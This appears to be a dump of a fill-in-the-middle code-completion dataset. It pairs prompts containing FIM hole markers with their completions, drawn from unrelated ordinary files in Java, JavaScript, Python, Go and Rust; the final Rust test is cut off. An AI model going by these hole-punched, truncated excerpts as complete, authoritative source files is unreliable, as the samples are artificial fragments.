prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>BeanPropertyComparator.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2005-2015 The Kuali Foundation
*
* Licensed under the Educational Community License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.opensource.org/licenses/ecl2.php
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.kuali.rice.krad.util;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.collections.comparators.ComparableComparator;
import org.kuali.rice.core.api.exception.KualiException;
import org.kuali.rice.core.api.util.type.TypeUtils;
import java.beans.PropertyDescriptor;
import java.io.Serializable;
import java.lang.reflect.InvocationTargetException;
import java.util.Collections;
import java.util.Comparator;
import java.util.Iterator;
import java.util.List;
/**
* BeanPropertyComparator compares the two beans using multiple property names
*
*
*/
public class BeanPropertyComparator implements Comparator, Serializable {
private static final long serialVersionUID = -2675700473766186018L;
boolean ignoreCase;
private List propertyNames;
private Comparator stringComparator;
private Comparator booleanComparator;
private Comparator genericComparator;
/**
* Constructs a PropertyComparator for comparing beans using the properties named in the given List
*
* <p>if the List is null, the beans will be compared directly
* by Properties will be compared in the order in which they are listed. Case will be ignored
* in String comparisons.</p>
*
* @param propertyNames List of property names (as Strings) used to compare beans
*/
public BeanPropertyComparator(List propertyNames) {
this(propertyNames, true);
}
/**
* Constructs a PropertyComparator for comparing beans using the properties named in the given List.
*
* <p>Properties will be compared
* in the order in which they are listed. Case will be ignored if ignoreCase is true.</p>
*
* @param propertyNames List of property names (as Strings) used to compare beans
* @param ignoreCase if true, case will be ignored during String comparisons
*/
public BeanPropertyComparator(List propertyNames, boolean ignoreCase) {
if (propertyNames == null) {
throw new IllegalArgumentException("invalid (null) propertyNames list");
}
if (propertyNames.size() == 0) {
throw new IllegalArgumentException("invalid (empty) propertyNames list");
}
this.propertyNames = Collections.unmodifiableList(propertyNames);
this.ignoreCase = ignoreCase;
if (ignoreCase) {
this.stringComparator = String.CASE_INSENSITIVE_ORDER;
}
else {
this.stringComparator = ComparableComparator.getInstance();
}
this.booleanComparator = new Comparator() {
public int compare(Object o1, Object o2) {
int compared = 0;
Boolean b1 = (Boolean) o1;
Boolean b2 = (Boolean) o2;
if (!b1.equals(b2)) {
if (b1.equals(Boolean.FALSE)) {
compared = -1;
}
else {
compared = 1;
}
}
return compared;
}
};
this.genericComparator = ComparableComparator.getInstance();
}
/**
* Compare two JavaBeans by the properties given to the constructor.
*
* @param o1 Object The first bean to get data from to compare against
* @param o2 Object The second bean to get data from to compare
* @return int negative or positive based on order
*/
public int compare(Object o1, Object o2) {
int compared = 0;
try {<|fim▁hole|> Comparator currentComparator = null;
try {
PropertyDescriptor propertyDescriptor = PropertyUtils.getPropertyDescriptor(o1, currentProperty);
Class propertyClass = propertyDescriptor.getPropertyType();
if (propertyClass.equals(String.class)) {
currentComparator = this.stringComparator;
}
else if (TypeUtils.isBooleanClass(propertyClass)) {
currentComparator = this.booleanComparator;
}
else {
currentComparator = this.genericComparator;
}
}
catch (NullPointerException e) {
throw new BeanComparisonException("unable to find property '" + o1.getClass().getName() + "." + currentProperty + "'", e);
}
// compare the values
Object value1 = PropertyUtils.getProperty(o1, currentProperty);
Object value2 = PropertyUtils.getProperty(o2, currentProperty);
/* Fix for KULRICE-5170 : BeanPropertyComparator throws exception when a null value is found in sortable non-string data type column */
if ( value1 == null && value2 == null)
return 0;
else if ( value1 == null)
return -1;
else if ( value2 == null )
return 1;
/* End KULRICE-5170 Fix*/
compared = currentComparator.compare(value1, value2);
}
}
catch (IllegalAccessException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
catch (NoSuchMethodException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
catch (InvocationTargetException e) {
throw new BeanComparisonException("unable to compare property values", e);
}
return compared;
}
public static class BeanComparisonException extends KualiException {
private static final long serialVersionUID = 2622379680100640029L;
/**
* @param message
* @param t
*/
public BeanComparisonException(String message, Throwable t) {
super(message, t);
}
}
}<|fim▁end|> | for (Iterator i = propertyNames.iterator(); (compared == 0) && i.hasNext();) {
String currentProperty = i.next().toString();
// choose appropriate comparator |
<|file_name|>server.js<|end_file_name|><|fim▁begin|>var express = require('express');
var http = require('http');
var path = require('path');
var app = express();
app.use(express.bodyParser());
app.use(app.router);
app.use(express.static(__dirname + '/public'));
// Simple REST server.
var users = [];
app.post('/user', function(req, res) {
users[req.body.name] = req.body;
res.send({ error: false });
});
app.get('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
res.send({ error: false, data: user });
} else {
res.send({ error: true });
}
});
app.put('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
res.send({ error: false });
user.weight = req.body.weight;
} else {
res.send({ error: true });<|fim▁hole|>app.del('/user/:name', function(req, res) {
var user = users[req.params.name];
if (user) {
delete users[req.params.name];
res.send({ error: false });
} else {
res.send({ error: true });
}
});
// XMLJSON file
app.get('/xhr-json.js', function(req, res) {
res.sendfile('xhr-json.js', { root: __dirname + '/..' });
});
// Mocha/Chai files
var mochaDir = path.dirname(require.resolve('mocha'));
var chaiDir = path.dirname(require.resolve('chai'));
app.get('/mocha.css', function(req, res) {
res.sendfile('mocha.css', { root: mochaDir });
});
app.get('/mocha.js', function(req, res) {
res.sendfile('mocha.js', { root: mochaDir });
});
app.get('/chai.js', function(req, res) {
res.sendfile('chai.js', { root: chaiDir });
});
http.createServer(app).listen(4444, function() {
console.log('Express server listening.');
});<|fim▁end|> | }
});
|
<|file_name|>debug_info.py<|end_file_name|><|fim▁begin|>"""Helper to handle a set of topics to subscribe to."""
from __future__ import annotations
from collections import deque
from collections.abc import Callable
import datetime as dt
from functools import wraps
from typing import Any
import attr
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry as er
from homeassistant.util import dt as dt_util
from .const import ATTR_DISCOVERY_PAYLOAD, ATTR_DISCOVERY_TOPIC
from .models import MessageCallbackType, PublishPayloadType
DATA_MQTT_DEBUG_INFO = "mqtt_debug_info"
STORED_MESSAGES = 10
def initialize(hass: HomeAssistant):
"""Initialize MQTT debug info."""
hass.data[DATA_MQTT_DEBUG_INFO] = {"entities": {}, "triggers": {}}
def log_messages(
hass: HomeAssistant, entity_id: str
) -> Callable[[MessageCallbackType], MessageCallbackType]:
"""Wrap an MQTT message callback to support message logging."""
def _log_message(msg):
"""Log message."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
messages = debug_info["entities"][entity_id]["subscriptions"][
msg.subscribed_topic
]["messages"]
if msg not in messages:
messages.append(msg)
def _decorator(msg_callback: MessageCallbackType) -> MessageCallbackType:
@wraps(msg_callback)
def wrapper(msg: Any) -> None:
"""Log message."""
_log_message(msg)
msg_callback(msg)
setattr(wrapper, "__entity_id", entity_id)
return wrapper
return _decorator
@attr.s(slots=True, frozen=True)
class TimestampedPublishMessage:
"""MQTT Message."""
topic: str = attr.ib()
payload: PublishPayloadType = attr.ib()
qos: int = attr.ib()
retain: bool = attr.ib()
timestamp: dt.datetime = attr.ib(default=None)
def log_message(
hass: HomeAssistant,<|fim▁hole|> topic: str,
payload: PublishPayloadType,
qos: int,
retain: bool,
) -> None:
"""Log an outgoing MQTT message."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
if topic not in entity_info["transmitted"]:
entity_info["transmitted"][topic] = {
"messages": deque([], STORED_MESSAGES),
}
msg = TimestampedPublishMessage(
topic, payload, qos, retain, timestamp=dt_util.utcnow()
)
entity_info["transmitted"][topic]["messages"].append(msg)
def add_subscription(hass, message_callback, subscription):
"""Prepare debug data for subscription."""
if entity_id := getattr(message_callback, "__entity_id", None):
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
if subscription not in entity_info["subscriptions"]:
entity_info["subscriptions"][subscription] = {
"count": 0,
"messages": deque([], STORED_MESSAGES),
}
entity_info["subscriptions"][subscription]["count"] += 1
def remove_subscription(hass, message_callback, subscription):
"""Remove debug data for subscription if it exists."""
entity_id = getattr(message_callback, "__entity_id", None)
if entity_id and entity_id in hass.data[DATA_MQTT_DEBUG_INFO]["entities"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"][
subscription
]["count"] -= 1
if not hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"][
subscription
]["count"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]["subscriptions"].pop(
subscription
)
def add_entity_discovery_data(hass, discovery_data, entity_id):
"""Add discovery data."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = debug_info["entities"].setdefault(
entity_id, {"subscriptions": {}, "discovery_data": {}, "transmitted": {}}
)
entity_info["discovery_data"] = discovery_data
def update_entity_discovery_data(hass, discovery_payload, entity_id):
"""Update discovery data."""
entity_info = hass.data[DATA_MQTT_DEBUG_INFO]["entities"][entity_id]
entity_info["discovery_data"][ATTR_DISCOVERY_PAYLOAD] = discovery_payload
def remove_entity_data(hass, entity_id):
"""Remove discovery data."""
if entity_id in hass.data[DATA_MQTT_DEBUG_INFO]["entities"]:
hass.data[DATA_MQTT_DEBUG_INFO]["entities"].pop(entity_id)
def add_trigger_discovery_data(hass, discovery_hash, discovery_data, device_id):
"""Add discovery data."""
debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
debug_info["triggers"][discovery_hash] = {
"device_id": device_id,
"discovery_data": discovery_data,
}
def update_trigger_discovery_data(hass, discovery_hash, discovery_payload):
"""Update discovery data."""
trigger_info = hass.data[DATA_MQTT_DEBUG_INFO]["triggers"][discovery_hash]
trigger_info["discovery_data"][ATTR_DISCOVERY_PAYLOAD] = discovery_payload
def remove_trigger_discovery_data(hass, discovery_hash):
"""Remove discovery data."""
hass.data[DATA_MQTT_DEBUG_INFO]["triggers"].pop(discovery_hash)
def _info_for_entity(hass: HomeAssistant, entity_id: str) -> dict[str, Any]:
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
entity_info = mqtt_debug_info["entities"][entity_id]
subscriptions = [
{
"topic": topic,
"messages": [
{
"payload": str(msg.payload),
"qos": msg.qos,
"retain": msg.retain,
"time": msg.timestamp,
"topic": msg.topic,
}
for msg in subscription["messages"]
],
}
for topic, subscription in entity_info["subscriptions"].items()
]
transmitted = [
{
"topic": topic,
"messages": [
{
"payload": str(msg.payload),
"qos": msg.qos,
"retain": msg.retain,
"time": msg.timestamp,
"topic": msg.topic,
}
for msg in subscription["messages"]
],
}
for topic, subscription in entity_info["transmitted"].items()
]
discovery_data = {
"topic": entity_info["discovery_data"].get(ATTR_DISCOVERY_TOPIC, ""),
"payload": entity_info["discovery_data"].get(ATTR_DISCOVERY_PAYLOAD, ""),
}
return {
"entity_id": entity_id,
"subscriptions": subscriptions,
"discovery_data": discovery_data,
"transmitted": transmitted,
}
def _info_for_trigger(hass: HomeAssistant, trigger_key: str) -> dict[str, Any]:
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
trigger = mqtt_debug_info["triggers"][trigger_key]
discovery_data = None
if trigger["discovery_data"] is not None:
discovery_data = {
"topic": trigger["discovery_data"][ATTR_DISCOVERY_TOPIC],
"payload": trigger["discovery_data"][ATTR_DISCOVERY_PAYLOAD],
}
return {"discovery_data": discovery_data, "trigger_key": trigger_key}
def info_for_config_entry(hass):
"""Get debug info for all entities and triggers."""
mqtt_info = {"entities": [], "triggers": []}
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
for entity_id in mqtt_debug_info["entities"]:
mqtt_info["entities"].append(_info_for_entity(hass, entity_id))
for trigger_key in mqtt_debug_info["triggers"]:
mqtt_info["triggers"].append(_info_for_trigger(hass, trigger_key))
return mqtt_info
def info_for_device(hass, device_id):
"""Get debug info for a device."""
mqtt_info = {"entities": [], "triggers": []}
entity_registry = er.async_get(hass)
entries = er.async_entries_for_device(
entity_registry, device_id, include_disabled_entities=True
)
mqtt_debug_info = hass.data[DATA_MQTT_DEBUG_INFO]
for entry in entries:
if entry.entity_id not in mqtt_debug_info["entities"]:
continue
mqtt_info["entities"].append(_info_for_entity(hass, entry.entity_id))
for trigger_key, trigger in mqtt_debug_info["triggers"].items():
if trigger["device_id"] != device_id:
continue
mqtt_info["triggers"].append(_info_for_trigger(hass, trigger_key))
return mqtt_info<|fim▁end|> | entity_id: str, |
<|file_name|>auditmessages.py<|end_file_name|><|fim▁begin|>#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util<|fim▁hole|> """ Configuration for audit message resource. """
def __init__(self) :
self._loglevel = []
self._numofmesgs = 0
self._value = ""
self.___count = 0
@property
def loglevel(self) :
"""Audit log level filter, which specifies the types of events to display.
The following loglevels are valid:
* ALL - All events.
* EMERGENCY - Events that indicate an immediate crisis on the server.
* ALERT - Events that might require action.
* CRITICAL - Events that indicate an imminent server crisis.
* ERROR - Events that indicate some type of error.
* WARNING - Events that require action in the near future.
* NOTICE - Events that the administrator should know about.
* INFORMATIONAL - All but low-level events.
* DEBUG - All events, in extreme detail.<br/>Possible values = ALL, EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, DEBUG.
"""
try :
return self._loglevel
except Exception as e:
raise e
@loglevel.setter
def loglevel(self, loglevel) :
"""Audit log level filter, which specifies the types of events to display.
The following loglevels are valid:
* ALL - All events.
* EMERGENCY - Events that indicate an immediate crisis on the server.
* ALERT - Events that might require action.
* CRITICAL - Events that indicate an imminent server crisis.
* ERROR - Events that indicate some type of error.
* WARNING - Events that require action in the near future.
* NOTICE - Events that the administrator should know about.
* INFORMATIONAL - All but low-level events.
* DEBUG - All events, in extreme detail.<br/>Possible values = ALL, EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, DEBUG
"""
try :
self._loglevel = loglevel
except Exception as e:
raise e
@property
def numofmesgs(self) :
"""Number of log messages to be displayed.<br/>Default value: 20<br/>Minimum length = 1<br/>Maximum length = 256.
"""
try :
return self._numofmesgs
except Exception as e:
raise e
@numofmesgs.setter
def numofmesgs(self, numofmesgs) :
"""Number of log messages to be displayed.<br/>Default value: 20<br/>Minimum length = 1<br/>Maximum length = 256
"""
try :
self._numofmesgs = numofmesgs
except Exception as e:
raise e
@property
def value(self) :
"""The Audit message.
"""
try :
return self._value
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(auditmessages_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.auditmessages
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the auditmessages resources that are configured on netscaler.
"""
try :
if not name :
obj = auditmessages()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_args(cls, client, args) :
""" Use this API to fetch all the auditmessages resources that are configured on netscaler.
# This uses auditmessages_args which is a way to provide additional arguments while fetching the resources.
"""
try :
obj = auditmessages()
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(args)
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of auditmessages resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = auditmessages()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the auditmessages resources configured on NetScaler.
"""
try :
obj = auditmessages()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of auditmessages resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = auditmessages()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Loglevel:
ALL = "ALL"
EMERGENCY = "EMERGENCY"
ALERT = "ALERT"
CRITICAL = "CRITICAL"
ERROR = "ERROR"
WARNING = "WARNING"
NOTICE = "NOTICE"
INFORMATIONAL = "INFORMATIONAL"
DEBUG = "DEBUG"
class auditmessages_response(base_response) :
def __init__(self, length=1) :
self.auditmessages = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.auditmessages = [auditmessages() for _ in range(length)]<|fim▁end|> |
class auditmessages(base_resource) : |
<|file_name|>baidu.js<|end_file_name|><|fim▁begin|>var mongoose = require('mongoose');
var Post = require('../models/Post').Post;
var config = require('../config');
var http = require('http');<|fim▁hole|>var site = "";
var token = "";
var options = {
host: 'data.zz.baidu.com',
path: '/urls?site=' + site + '&token=' + token,
method: 'POST',
headers: {
'Accept': '*/*',
'Connection': 'Keep-Alive',
'User-Agent': 'curl/7.12.1 '
}
};
var callback = function (res) {
var buffers = [];
var nread = 0;
res.on('data', function (chunk) {
buffers.push(chunk);
nread += chunk.length;
});
res.on('end', function () {
console.log(buffers);
});
}
var req = http.request(options, callback);
mongoose.connect(config.db.production);
var db = mongoose.connection;
db.once('open', function (callback) {
Post.find({}, {pid: 1})
.exec(function (err, posts) {
var urls = posts.map(function (post) {
return 'http://' + config.site.url + '/post/' + post.pid;
});
var data = urls.join('\n');
console.log(data,urls.length);
req.write(data);
req.end();
});
});<|fim▁end|> | |
<|file_name|>backend.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2013 Julien Veyssier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.recipe import ICapRecipe, Recipe
from weboob.tools.backend import BaseBackend
from .browser import SevenFiftyGramsBrowser
import unicodedata
def strip_accents(s):
return ''.join(c for c in unicodedata.normalize('NFD', s) if unicodedata.category(c) != 'Mn')
__all__ = ['SevenFiftyGramsBackend']
class SevenFiftyGramsBackend(BaseBackend, ICapRecipe):
NAME = '750g'
MAINTAINER = u'Julien Veyssier'
EMAIL = '[email protected]'
VERSION = '0.h'
DESCRIPTION = u'750g French recipe website'
LICENSE = 'AGPLv3+'
BROWSER = SevenFiftyGramsBrowser
def get_recipe(self, id):
return self.browser.get_recipe(id)
def iter_recipes(self, pattern):
return self.browser.iter_recipes(strip_accents(unicode(pattern)).encode('utf-8'))
def fill_recipe(self, recipe, fields):
if 'nb_person' in fields or 'instructions' in fields:
rec = self.get_recipe(recipe.id)
recipe.picture_url = rec.picture_url<|fim▁hole|> recipe.ingredients = rec.ingredients
recipe.comments = rec.comments
recipe.author = rec.author
recipe.nb_person = rec.nb_person
recipe.cooking_time = rec.cooking_time
recipe.preparation_time = rec.preparation_time
return recipe
OBJECTS = {
Recipe: fill_recipe,
}<|fim▁end|> | recipe.instructions = rec.instructions |
<|file_name|>test_temp.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# Unit Tests for temp module
#
# See __usage__ for an explanation of runtime arguments.
#
# -Christopher Blunck
#
import unittest
from ..temp import *
__author__ = 'Christopher Blunck'
__email__ = '[email protected]'
__revision__ = '$Revision: 1.6 $'
__doc__ = '''
Unit tests the temp module.
'''
__usage__ = '''
python $0
'''
def usage():
print(__usage__)
sys.exit(1)
class TestCase(unittest.TestCase):
def setUp(self): pass
def tearDown(self): pass
def test__calc_heat_index(self):
# if the temperature is < 80, heat index == temperature
assert calc_heat_index(70, 100) == 70 , "value not correct"
assert calc_heat_index(79.9, 100) == 79.9 , "value not correct"
assert calc_heat_index(80, 100) != 80 , "value not correct"
# make sure some hard-coded values work
assert int(calc_heat_index(80, 100)) == 87, "value not correct"
assert int(calc_heat_index(80, 10)) == 78, "value not correct"
assert int(calc_heat_index(90, 50)) == 94, "value not correct"
assert int(calc_heat_index(120, 100)) == 380, "value not correct"
def test__calc_wind_chill(self):
# make sure some hard-coded values work
assert int(calc_wind_chill(80, 10)) == 83, "value not correct"
assert int(calc_wind_chill(32, 10)) == 23, "value not correct"
assert int(calc_wind_chill(-20, 5)) == -34, "value not correct"
def test__fahrenheit_to_celsius(self):
# make sure some special values work
assert int(fahrenheit_to_celsius(32)) == 0, "value not correct"
assert int(fahrenheit_to_celsius(212)) == 100, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_celsius(60)) == 15, "value not correct"
assert int(fahrenheit_to_celsius(-60)) == -51, "value not correct"
assert int(fahrenheit_to_celsius(90)) == 32, "value not correct"
def test__celsius_to_fahrenheit(self):
# make sure some special values work
assert int(celsius_to_fahrenheit(0)) == 32, "value not correct"
assert int(celsius_to_fahrenheit(100)) == 212, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_fahrenheit(60)) == 140, "value not correct"
assert int(celsius_to_fahrenheit(-60)) == -76, "value not correct"
assert int(celsius_to_fahrenheit(30)) == 86, "value not correct"
def test__celsius_to_kelvin(self):
# make sure some special values work
assert int(celsius_to_kelvin(-273.15)) == 0, "value not correct"
assert int(celsius_to_kelvin(100)) == 373, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_kelvin(60)) == 333, "value not correct"
assert int(celsius_to_kelvin(-60)) == 213, "value not correct"
assert int(celsius_to_kelvin(30)) == 303, "value not correct"
def test__celsius_to_rankine(self):
# make sure some special values work
assert int(celsius_to_rankine(0)) == 491, "value not correct"
assert int(celsius_to_rankine(100)) == 671, "value not correct"
# make sure some hard coded values work
assert int(celsius_to_rankine(60)) == 599, "value not correct"
assert int(celsius_to_rankine(-60)) == 383, "value not correct"
assert int(celsius_to_rankine(30)) == 545, "value not correct"
def test__fahrenheit_to_kelvin(self):
# make sure some special values work
assert int(fahrenheit_to_kelvin(32)) == 273, "value not correct"
assert int(fahrenheit_to_kelvin(212)) == 373, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_kelvin(60)) == 288, "value not correct"
assert int(fahrenheit_to_kelvin(-60)) == 222, "value not correct"
assert int(fahrenheit_to_kelvin(90)) == 305, "value not correct"
def test__fahrenheit_to_rankine(self):
# make sure some special values work
assert int(fahrenheit_to_rankine(32)) == 491, "value not correct"
assert int(fahrenheit_to_rankine(212)) == 671, "value not correct"
# make sure some hard coded values work
assert int(fahrenheit_to_rankine(60)) == 519, "value not correct"
assert int(fahrenheit_to_rankine(-60)) == 399, "value not correct"
assert int(fahrenheit_to_rankine(90)) == 549, "value not correct"
def test__kelvin_to_celsius(self):
# make sure some special values work
assert int(kelvin_to_celsius(273.15)) == 0, "value not correct"
assert int(kelvin_to_celsius(373.15)) == 100, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_celsius(0)) == -273, "value not correct"
assert int(kelvin_to_celsius(293.15)) == 20, "value not correct"
assert int(kelvin_to_celsius(343.15)) == 70, "value not correct"
def test__kelvin_to_fahrenheit(self):
# make sure some special values work
assert int(kelvin_to_fahrenheit(273.15)) == 32, "value not correct"
assert int(kelvin_to_fahrenheit(373.15)) == 212, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_fahrenheit(0)) == -459, "value not correct"
assert int(kelvin_to_fahrenheit(293.15)) == 68, "value not correct"
assert int(kelvin_to_fahrenheit(343.15)) == 158, "value not correct"
def test__kelvin_to_rankine(self):
# make sure some special values work
assert int(kelvin_to_rankine(273.15)) == 491, "value not correct"
assert int(kelvin_to_rankine(373.15)) == 671, "value not correct"
# make sure some hard coded values work
assert int(kelvin_to_rankine(0)) == 0, "value not correct"
assert int(kelvin_to_rankine(293.15)) == 527, "value not correct"
assert int(kelvin_to_rankine(343.15)) == 617, "value not correct"
def test__rankine_to_celsius(self):
# make sure some special values work
assert int(rankine_to_celsius(491)) == 0, "value not correct"
assert int(rankine_to_celsius(671)) == 99, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_celsius(0)) == -273, "value not correct"
assert int(rankine_to_celsius(527)) == 19, "value not correct"
assert int(rankine_to_celsius(617)) == 69, "value not correct"
def test__rankine_to_fahrenheit(self):
# make sure some special values work
assert int(rankine_to_fahrenheit(491)) == 31, "value not correct"
assert int(rankine_to_fahrenheit(671)) == 211, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_fahrenheit(0)) == -459, "value not correct"
assert int(rankine_to_fahrenheit(527)) == 67, "value not correct"
assert int(rankine_to_fahrenheit(617)) == 157, "value not correct"
def test__rankine_to_kelvin(self):
# make sure some special values work
assert int(rankine_to_kelvin(491)) == 272, "value not correct"
assert int(rankine_to_kelvin(671)) == 372, "value not correct"
# make sure some hard coded values work
assert int(rankine_to_kelvin(0)) == 0, "value not correct"
assert int(rankine_to_kelvin(527)) == 292, "value not correct"
assert int(rankine_to_kelvin(617)) == 342, "value not correct"
def test__dewpoint(self):<|fim▁hole|> # make sure some hard coded values work
assert int(calc_dewpoint(12, 72)) == 4, "value not correct"
assert int(calc_dewpoint(75, 33)) == 43, "value not correct"
assert int(calc_dewpoint(90, 85)) == 84, "value not correct"
def test__humidity(self):
# make sure some hard coded values work
assert int(calc_humidity(87, 76) * 100) == 69, "value not correct"
assert int(calc_humidity(75, 45) * 100) == 34, "value not correct"
assert int(calc_humidity(50, 10) * 100) == 19, "value not correct"
assert int(calc_humidity(100, 88) * 100) == 68, "value not correct"
def main():
suite = unittest.makeSuite(TestCase, 'test')
runner = unittest.TextTestRunner()
runner.run(suite)
if __name__ == '__main__':
main()<|fim▁end|> | |
<|file_name|>plug.go<|end_file_name|><|fim▁begin|>package xrest
type Plugger interface {
Plug(Handler) Handler<|fim▁hole|><|fim▁end|> | } |
<|file_name|>buddhist.js.uncompressed.js<|end_file_name|><|fim▁begin|><|fim▁hole|>version https://git-lfs.github.com/spec/v1
oid sha256:ff6a5c1204e476c89870c6f14e75db666fa26de9359f9d8c372ef779b55c8875
size 2736<|fim▁end|> | |
<|file_name|>Socket.js<|end_file_name|><|fim▁begin|>var socketio = require('socket.io'),
dotProp = require('dot-prop');
/**
* Constructs a Socket.
* Socket manager powered by Socket.IO.
*
* @constructor
*/
function Socket(){
this.port = null;
this.io = null;
this.scope = {};
}
Socket.prototype.start = function () {
var self = this;
var settings = self.scope.settings();
self.io = socketio(settings.socket.port);
self.io.on('connection', function (socket) {
socket.emit('structure', {key: self.scope.key, title: self.scope.title, sub: self.scope.sub});<|fim▁hole|> });
});
return self;
};
module.exports = new Socket();<|fim▁end|> | socket.on('call', function(data){
dotProp.get(self.scope, data.path).job.call(data); |
<|file_name|>ifmt.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// no-pretty-expanded unnecessary unsafe block generated
// ignore-lexer-test FIXME #15679
#![feature(macro_rules)]
#![deny(warnings)]
#![allow(unused_must_use)]
use std::fmt;
use std::io;
struct A;
struct B;
struct C;
impl fmt::LowerHex for A {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write("aloha".as_bytes())
}
}
impl fmt::UpperHex for B {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write("adios".as_bytes())
}
}
impl fmt::Show for C {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.pad_integral(true, "☃", "123".as_bytes())
}
}
macro_rules! t(($a:expr, $b:expr) => { assert_eq!($a.as_slice(), $b) })
pub fn main() {
// Various edge cases without formats
t!(format!(""), "");
t!(format!("hello"), "hello");
t!(format!("hello {{"), "hello {");
// default formatters should work
t!(format!("{}", 1.0f32), "1");
t!(format!("{}", 1.0f64), "1");
t!(format!("{}", "a"), "a");
t!(format!("{}", "a".to_string()), "a");
t!(format!("{}", false), "false");
t!(format!("{}", 'a'), "a");
// At least exercise all the formats
